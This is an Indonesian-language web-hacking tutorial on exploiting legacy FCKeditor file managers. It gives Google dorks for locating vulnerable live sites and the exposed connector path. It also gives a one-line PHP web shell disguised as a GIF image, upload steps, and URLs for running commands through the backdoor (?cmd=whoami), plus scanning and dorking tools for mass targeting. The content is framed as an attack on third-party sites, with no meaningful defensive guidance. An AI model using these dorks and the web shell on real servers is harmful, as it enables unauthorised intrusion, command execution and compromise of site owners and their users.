FCKeditor: Upload Gambar hingga Up Shell

Eksploitasi FCKeditor: Upload Gambar hingga Up Shell

By: Nyx6st

Pendahuluan

FCKeditor adalah editor WYSIWYG yang populer pada era 2000-an hingga awal 2010-an. Sayangnya, versi lama dari FCKeditor mengandung celah keamanan serius pada fitur file manager-nya. Bug ini memungkinkan penyerang mengupload file ke server, termasuk file gambar palsu atau bahkan shell (backdoor) jika server tidak mengatur MIME type dan validasi dengan baik.

Targeting: Dork Google

Untuk menemukan target yang masih menggunakan FCKeditor lawas, kita bisa memanfaatkan Google dork sebagai senjata pencarian:

inurl:advert_detail.php?id=

Dork ini menyaring halaman-halaman PHP yang mungkin memiliki parameter id dan berpotensi terhubung dengan halaman admin di mana FCKeditor aktif digunakan.

Catatan: Kombinasikan dork ini dengan intitle:FCKeditor atau inurl:FCKeditor/editor/ untuk hasil lebih spesifik.

Eksploitasi: Akses Filemanager FCKeditor

Jika target memiliki endpoint seperti:

/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

Maka besar kemungkinan kita bisa mengakses filemanager-nya langsung.

1. Buka link tersebut di browser.
2. Jika tidak diproteksi, maka UI filemanager FCKeditor akan muncul.
3. Gunakan fitur upload image di dalamnya.
4. Upload gambar dengan ekstensi .jpg, .gif, atau .png, namun isi file sebenarnya bisa berupa kode PHP jika server tidak memvalidasi kontennya.

Contoh file PHP disamarkan sebagai gambar:

GIF89a

<?php system($_GET['cmd']); ?>

  

Simpan sebagai shell.jpg dan upload melalui panel filemanager.

Akses Backdoor

Setelah upload berhasil, biasanya file akan tersimpan di:

http://target.com/userfiles/image/shell.jpg

Atau:

http://target.com/images/gambar.jpg

Langsung akses file tersebut dan coba eksekusi perintah:

http://target.com/images/gambar.jpg?cmd=whoami

Tools Pendukung

• FCKfinder Scanner: mencari endpoint FCKeditor
• 6ickSQL Sniper v6: untuk scanning target SQLi lalu chaining ke endpoint upload seperti FCKeditor
• Dorker tools (Python/Go): scrap hasil dork Google dan uji langsung endpoint

Kesimpulan

FCKeditor adalah celah klasik yang masih sering ditemukan di situs-situs tua atau legacy. Dengan dork yang tepat dan sedikit pengamatan, eksploitasi bisa dilakukan hanya dalam beberapa menit. Namun yang lebih penting adalah memahami mengapa celah ini terjadi, agar kita bisa membantu dunia lebih aman—atau lebih kreatif di dunia webhacking.